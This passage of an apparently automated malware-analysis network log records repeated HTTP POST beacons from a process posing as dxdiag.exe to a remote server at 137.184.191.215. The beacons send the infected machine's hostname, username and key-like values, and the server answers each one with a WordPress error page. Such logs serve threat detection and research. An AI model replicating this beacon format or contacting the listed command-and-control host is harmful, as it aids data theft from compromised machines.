                        Content-Length: 2557
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                        Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                        Oct 1, 2024 07:47:46.917273998 CEST1236INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                        Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
                        Oct 1, 2024 07:47:46.917290926 CEST366INData Raw: 66 35 66 36 3b 0a 09 09 09 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 37 65 38 39 39 33 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a
                        Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        16192.168.2.549732137.184.191.215802072C:\Windows\SysWOW64\dxdiag.exe
                        TimestampBytes transferredDirectionData
                        Oct 1, 2024 07:47:47.074932098 CEST251OUTPOST /index.php/check.php?id=1 HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: 137.184.191.215
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: C7D7BA0
                        Content-Length: 153
                        Connection: close
                        Oct 1, 2024 07:47:47.079801083 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 31 00 31 00 36 00 39 00 33 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                        Data Ascii: (ckav.rualfons116938ALFONS-PC0FDD42EE188E931437F4FBE2C
                        Oct 1, 2024 07:47:49.642642021 CEST1236INHTTP/1.0 500 Internal Server Error
                        Date: Tue, 01 Oct 2024 05:47:47 GMT
                        Server: Apache/2.4.52 (Ubuntu)
                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                        Cache-Control: no-cache, must-revalidate, max-age=0
                        Content-Length: 2557
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                        Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                        Oct 1, 2024 07:47:49.642672062 CEST224INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                        Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus
                        Oct 1, 2024 07:47:49.643098116 CEST1236INData Raw: 7b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 30 34 33 39 35 39 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 30 20 30 20 32 70 78 20 23 32 32 37 31 62 31 3b 0a 09 09 09 6f 75 74 6c 69 6e 65 3a 20 32 70 78 20 73 6f 6c 69 64 20 74 72 61 6e 73
                        Data Ascii: {color: #043959;box-shadow: 0 0 0 2px #2271b1;outline: 2px solid transparent;}.button {background: #f3f5f6;border: 1px solid #016087;color: #016087;display: inline-block;text-decoration: none;font-size
                        Oct 1, 2024 07:47:49.643117905 CEST142INData Raw: 3d 22 68 74 74 70 73 3a 2f 2f 77 6f 72 64 70 72 65 73 73 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2f 61 72 74 69 63 6c 65 2f 66 61 71 2d 74 72 6f 75 62 6c 65 73 68 6f 6f 74 69 6e 67 2f 22 3e 4c 65 61 72 6e 20 6d 6f 72 65 20 61 62 6f
                        Data Ascii: ="https://wordpress.org/documentation/article/faq-troubleshooting/">Learn more about troubleshooting WordPress.</a></p></div></body></html>


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        17192.168.2.549733137.184.191.215802072C:\Windows\SysWOW64\dxdiag.exe
                        TimestampBytes transferredDirectionData
                        Oct 1, 2024 07:47:49.790544987 CEST251OUTPOST /index.php/check.php?id=1 HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: 137.184.191.215
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: C7D7BA0
                        Content-Length: 153
                        Connection: close
                        Oct 1, 2024 07:47:49.795411110 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 31 00 31 00 36 00 39 00 33 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                        Data Ascii: (ckav.rualfons116938ALFONS-PC0FDD42EE188E931437F4FBE2C
                        Oct 1, 2024 07:47:52.405380011 CEST1236INHTTP/1.0 500 Internal Server Error
                        Date: Tue, 01 Oct 2024 05:47:50 GMT
                        Server: Apache/2.4.52 (Ubuntu)
                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                        Cache-Control: no-cache, must-revalidate, max-age=0
                        Content-Length: 2557
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                        Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                        Oct 1, 2024 07:47:52.405395985 CEST1236INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                        Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
                        Oct 1, 2024 07:47:52.405406952 CEST366INData Raw: 66 35 66 36 3b 0a 09 09 09 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 37 65 38 39 39 33 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a
                        Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        18192.168.2.549734137.184.191.215802072C:\Windows\SysWOW64\dxdiag.exe
                        TimestampBytes transferredDirectionData
                        Oct 1, 2024 07:47:52.561920881 CEST251OUTPOST /index.php/check.php?id=1 HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: 137.184.191.215
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: C7D7BA0
                        Content-Length: 153
                        Connection: close
                        Oct 1, 2024 07:47:52.566806078 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 31 00 31 00 36 00 39 00 33 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                        Data Ascii: (ckav.rualfons116938ALFONS-PC0FDD42EE188E931437F4FBE2C
                        Oct 1, 2024 07:47:55.095746994 CEST1236INHTTP/1.0 500 Internal Server Error
                        Date: Tue, 01 Oct 2024 05:47:53 GMT
                        Server: Apache/2.4.52 (Ubuntu)
                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                        Cache-Control: no-cache, must-revalidate, max-age=0
                        Content-Length: 2557
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                        Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                        Oct 1, 2024 07:47:55.095768929 CEST1236INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                        Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
                        Oct 1, 2024 07:47:55.095781088 CEST366INData Raw: 66 35 66 36 3b 0a 09 09 09 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 37 65 38 39 39 33 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a
                        Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        19192.168.2.549735137.184.191.215802072C:\Windows\SysWOW64\dxdiag.exe
                        TimestampBytes transferredDirectionData
                        Oct 1, 2024 07:47:55.534801006 CEST251OUTPOST /index.php/check.php?id=1 HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: 137.184.191.215
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: C7D7BA0
                        Content-Length: 153
                        Connection: close
                        Oct 1, 2024 07:47:55.539715052 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 31 00 31 00 36 00 39 00 33 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                        Data Ascii: (ckav.rualfons116938ALFONS-PC0FDD42EE188E931437F4FBE2C
                        Oct 1, 2024 07:47:58.090150118 CEST1236INHTTP/1.0 500 Internal Server Error
                        Date: Tue, 01 Oct 2024 05:47:56 GMT
                        Server: Apache/2.4.52 (Ubuntu)
                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                        Cache-Control: no-cache, must-revalidate, max-age=0
                        Content-Length: 2557
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                        Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                        Oct 1, 2024 07:47:58.090207100 CEST224INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                        Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus
                        Oct 1, 2024 07:47:58.090217113 CEST1236INData Raw: 7b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 30 34 33 39 35 39 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 30 20 30 20 32 70 78 20 23 32 32 37 31 62 31 3b 0a 09 09 09 6f 75 74 6c 69 6e 65 3a 20 32 70 78 20 73 6f 6c 69 64 20 74 72 61 6e 73
                        Data Ascii: {color: #043959;box-shadow: 0 0 0 2px #2271b1;outline: 2px solid transparent;}.button {background: #f3f5f6;border: 1px solid #016087;color: #016087;display: inline-block;text-decoration: none;font-size
                        Oct 1, 2024 07:47:58.090226889 CEST142INData Raw: 3d 22 68 74 74 70 73 3a 2f 2f 77 6f 72 64 70 72 65 73 73 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2f 61 72 74 69 63 6c 65 2f 66 61 71 2d 74 72 6f 75 62 6c 65 73 68 6f 6f 74 69 6e 67 2f 22 3e 4c 65 61 72 6e 20 6d 6f 72 65 20 61 62 6f
                        Data Ascii: ="https://wordpress.org/documentation/article/faq-troubleshooting/">Learn more about troubleshooting WordPress.</a></p></div></body></html>


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        20192.168.2.549736137.184.191.215802072C:\Windows\SysWOW64\dxdiag.exe
                        TimestampBytes transferredDirectionData
                        Oct 1, 2024 07:47:58.244674921 CEST251OUTPOST /index.php/check.php?id=1 HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: 137.184.191.215
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: C7D7BA0
                        Content-Length: 153
                        Connection: close
                        Oct 1, 2024 07:47:58.249624014 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 31 00 31 00 36 00 39 00 33 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                        Data Ascii: (ckav.rualfons116938ALFONS-PC0FDD42EE188E931437F4FBE2C
                        Oct 1, 2024 07:48:00.870961905 CEST1236INHTTP/1.0 500 Internal Server Error
                        Date: Tue, 01 Oct 2024 05:47:58 GMT
                        Server: Apache/2.4.52 (Ubuntu)
                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                        Cache-Control: no-cache, must-revalidate, max-age=0
                        Content-Length: 2557
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                        Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
